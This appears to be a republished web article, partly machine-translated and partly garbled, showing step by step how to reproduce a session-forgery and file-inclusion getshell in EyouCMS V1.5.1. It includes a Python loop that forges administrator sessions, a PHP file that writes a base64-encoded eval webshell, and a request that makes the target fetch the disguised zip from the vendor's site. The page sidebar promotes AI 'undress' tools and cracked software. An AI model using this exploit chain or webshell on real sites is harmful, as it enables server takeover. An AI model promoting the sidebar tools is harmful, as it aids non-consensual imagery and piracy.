search
HomeOperation and MaintenanceSafetyHow to reproduce the EyouCMS V1.5.1 front-end getshell vulnerability

0x00 Vulnerability Introduction

Zanzan Network Technology EyouCMS (EyouCMS) is a set of open source content management based on ThinkPHP of China Zanzan Network Technology Company System (CMS).

Eyoucms v1.5.1 and previous versions have any user background login and file inclusion vulnerabilities. This vulnerability allows an attacker to set an administrator's session in the foreground by calling the API, and the background remote plug-in download file contains getshell.

0x01 Affected version

EyouCMS

0x02 Environment setup

Download
Official website download version V1.5.1
Download link: https://qiniu.eyoucms.com/EyouCMS-V1.5.1-UTF8-SP3_142.zip

Installation
Simple deployment through the phpstudy integrated environment
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

##0x03 Vulnerability Analysis

Set the administrator session at the front desk in application/api/controller/Ajax.php :215

如何进行EyouCMS V1.5.1 前台getshell漏洞复现

##get_token

function can be called at will by the front desk, and the

# in the formal parameters ##$name

Variables are also passed in through http. Follow up the token function, as shown in the figure below.


There is an operation to set the session in the highlight. The name is controllable, and the value is the value of the request timestamp md5. Can not control. 如何进行EyouCMS V1.5.1 前台getshell漏洞复现You can try to construct a background administrator's session through this session setting operation. Then we sort out the login logic of the background administrator. In application/admin/controller/Base.php:54


, two sessions are involved, one admin_login_expire and one admin_id如何进行EyouCMS V1.5.1 前台getshell漏洞复现

if (session('?admin_id') && getTime() - intval($admin_login_expire) <p>admin_login_expire</p><p> <code> (This session will perform subtraction verification, and certain conditions need to be met) </code></p><p>admin_id</p><p><code> (This session only needs to be present, and its value will not be verified. )</code>After setting up these two sessions, we continue to see that there is a </p><p><br>check_priv</p><p><code> function in the if condition judgment, follow up to check: </code></p><p></p><pre class="brush:php;toolbar:false">if (0 >= intval(session('admin_info.role_id')))

如何进行EyouCMS V1.5.1 前台getshell漏洞复现admin_info.role_id

(It is enough if it is less than or equal to 0)After setting up three sessions, you can enter the background. As shown in the figure:



The background remote plug-in download getshell passes in a $url in application/admin/controller/Weapp.php:1235如何进行EyouCMS V1.5.1 前台getshell漏洞复现

. Then do a url parsing, which requires the host to be eyoucms.com. 如何进行EyouCMS V1.5.1 前台getshell漏洞复现That is, the program is restricted to downloading and installing plug-ins from the official website, but this verification is too simple and can be bypassed.

Then the following is to request the download link, decompress it, and include config.php.




The plug-in standard judgment made later will no longer work. 如何进行EyouCMS V1.5.1 前台getshell漏洞复现

0x04 Vulnerability Exploitation

Set an administrator session at the front deskFirst we can take out the administrator session after successful login and the ordinary user session that has not logged in For comparison

Administrator:




Ordinary user:如何进行EyouCMS V1.5.1 前台getshell漏洞复现


Call the get_token function to set the session named admin_login_expire如何进行EyouCMS V1.5.1 前台getshell漏洞复现


Check the normal user's session如何进行EyouCMS V1.5.1 前台getshell漏洞复现


has been successfully set up. 如何进行EyouCMS V1.5.1 前台getshell漏洞复现Similarly we can add admin_id and admin_info.roke_id.

But
This md5 string obviously does not meet the requirements of vulnerability analysis, so the session is constantly refreshed through the script until the appropriate md5 value is found

while 1 :
    admin_login_expire = api_psot("admin_login_expire")
    num_10 = admin_login_expire[2:12]
    if is_number(num_10):
        print("admin_login_expire=",num_10)
        break
while 1 :
    role_id = api_psot("admin_info.role_id")
    num_1 = role_id[2:3]
    if num_1 in ["a","b","c","d","e","f"]:
        print("role_id=",num_1)
        break
admin_id = api_psot("admin_id")
print("admin_id=",admin_id[2:-1])
Running results:

session:
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

再经过application/admin/controller/Base.php:58和:106的intval()的转换:
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

成功使用该PHPSESSID进入后台:
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

后台远程插件下载文件包含getshell
然后开始制作恶意压缩包,文件目录结构如下:

weappp\weapp\test\config.phpconfig.php

文件内容为写入webshell

<?php   file_put_contents("./uploads/allimg/news_2021.php",base64_decode("PD9waHAgcGhwaW5mbygpO0BldmFsKCRfUE9TVFttb3Z4XSk7Pz4="));
?>

压缩成weappp.zip,修改后缀为jpg
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

到eyoucms.com官网寻找图片上传点
比如这个提问模块的问题描述:
https://www.eyoucms.com/ask/
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

获取到上传的图片地址:
https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
直接在浏览器中请求下载该插件:
http://192.168.58.180/login.php?m=admin&c=weapp&a=downloadInstall&url=https://www.eyoucms.com/uploads/allimg/210420/1618908445631562.jpg
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

此时webshell已成功写入:
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

访问webshell:
如何进行EyouCMS V1.5.1 前台getshell漏洞复现

0x05 修复建议

升级EyouCMS至V1.5.2或以后版本。

The above is the detailed content of How to reproduce the EyouCMS V1.5.1 front-end getshell vulnerability. For more information, please follow other related articles on the PHP Chinese website!

Statement
This article is reproduced at:亿速云. If there is any infringement, please contact admin@php.cn delete

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

EditPlus Chinese cracked version

EditPlus Chinese cracked version

Small size, syntax highlighting, does not support code prompt function

SublimeText3 Linux new version

SublimeText3 Linux new version

SublimeText3 Linux latest version

SecLists

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.